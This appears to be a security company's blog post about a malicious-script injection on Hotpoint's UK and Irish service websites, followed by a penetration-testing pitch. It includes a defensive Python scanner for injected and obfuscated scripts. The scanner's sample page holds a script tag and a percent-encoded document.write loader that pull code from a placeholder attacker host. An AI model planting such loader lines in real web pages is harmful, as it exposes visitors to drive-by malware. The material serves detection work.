Hotpoint’s UK service websites were hacked over the Easter weekend.
Fake Java update dialogs started appearing on the company’s sites; clicking on them took visitors to a malware payload.
The hack has also affected Hotpoint's Irish service website, which is hosted on the same IP address as the UK one.
The appended code is obfuscated to make its purpose less apparent, perhaps in the hope that nobody would dare to delete it. De-obfuscating the code reveals that it is responsible for loading a larger obfuscated script from an external site.
Presumably, this external site is operated by the hacker, in which case he has the opportunity to change the content of his malicious payload at will. Any visitor to the Hotpoint service site could consequently be at risk of much more serious attacks, such as drive-by malware or phishing.
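As an added illustration (not code from the story or from Hotpoint), the following Python check looks for the two traces this kind of injection leaves in a served page: script tags loading from hosts outside a site's allowlist, and inline scripts dense in the constructs obfuscated loaders rely on. The allowlist hosts, the attacker host and the sample page are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Hosts the site legitimately loads scripts from (placeholder allowlist).
ALLOWED_SCRIPT_HOSTS = {"www.service.example", "ajax.googleapis.com"}
# Constructs typical of obfuscated loaders; scored by density, since legitimate code uses some too.
OBFUSCATION_MARKERS = re.compile(
    r"eval\s*\(|unescape\s*\(|fromCharCode|document\.write\s*\(|\\x[0-9a-f]{2}|%[0-9a-f]{2}",
    re.IGNORECASE)

class _ScriptCollector(HTMLParser):
    # Collects external script URLs and inline script bodies from a page.
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)
def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, threshold=0.02):
    """Return (kind, detail) for scripts loaded from hosts off the allowlist (relative URLs are
    same-origin and skipped) and inline scripts whose marker density per character exceeds threshold."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external-src", src))
    for body in parser.inline:
        hits = len(OBFUSCATION_MARKERS.findall(body))
        if body and hits / len(body) > threshold:
            findings.append(("obfuscated-inline", body.strip()[:40]))
    return findings

# Constructed sample: legitimate script and benign inline script, then an appended loader
# and a percent-encoded document.write stub pulling from a placeholder attacker host.
SAMPLE_PAGE = """<html><head><script src="https://www.service.example/js/site.js"></script><script>var guarantee = 10;</script></head>
<body>Register your 10 year parts guarantee</body>
<script src="http://attacker.example/loader.js"></script>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fattacker.example%2Fx.js%22%3E%3C%2Fscript%3E'))</script>
</html>"""
```

Running the check on a site's pages on a schedule and diffing the findings against a known-good baseline turns it into a simple integrity monitor for this class of defacement.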
Many bank holiday shoppers who buy Hotpoint white goods are likely to fall victim to this attack, as the paperwork included with new appliances directs new customers to the site to activate their 10 year parts guarantee.
Generally, the Easter bank holiday weekend is a good time for hackers to strike UK websites, as many people will be on holiday on both Good Friday and the following Monday. The longer the attacker can keep his redirection code in place, the more revenue he can reap.
Of course, there could be wider-reaching repercussions to this attack – if an attacker has been able to modify scripts on Hotpoint's website, then he could also have been in a position to view any data stored or transmitted by the site.
How can Pen testing prevent vulnerabilities?
One of the key steps in measuring operational risk is understanding where you are vulnerable to attack, and where you may already have been compromised.
Penetration (Pen) Testing is a specialised discipline that encompasses a lot more than simply running a Vulnerability Assessment (VA) tool. Pen tests should follow formal procedures, use a multitude of scan tools and, more importantly, be undertaken by experienced engineers who can interpret the Vulnerability Assessment results to create stronger cascading attack scenarios. The test should also be undertaken by staff independent of any other function, to ensure the testers provide objective and impartial reports. CST can help with this approach.
You can read the original story here.